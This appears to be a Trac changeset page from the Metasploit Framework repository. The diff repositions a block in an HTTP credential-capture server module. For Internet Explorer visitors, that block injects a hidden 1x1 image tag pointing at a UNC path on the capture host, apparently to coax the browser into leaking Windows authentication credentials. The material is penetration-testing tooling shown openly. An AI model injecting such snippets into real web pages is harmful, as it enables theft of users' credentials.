Changeset 5487
- Timestamp:
- 04/21/08 17:02:39 (4 weeks ago)
- Files:
Legend:
- Unmodified
- Added
- Removed
- Modified
- Copied
- Moved
framework3/trunk/modules/auxiliary/server/capture/http.rb
r5486 r5487 254 254 255 255 buff = '' 256 257 if(ua_name == "IE")258 buff << "<img src='\\\\#{mysrc}\\public#{Time.now.to_i.to_s}\\loading.jpg' width='1' height='1'>"259 end260 256 261 257 list = File.readlines(@sitelist) … … 267 263 end 268 264 265 if(ua_name == "IE") 266 buff << "<img src='\\\\#{mysrc}\\public#{Time.now.to_i.to_s}\\loading.jpg' width='1' height='1'>" 267 end 268 269 269 data = File.read(@template) 270 270 data.gsub!(/%CONTENT%/, buff)
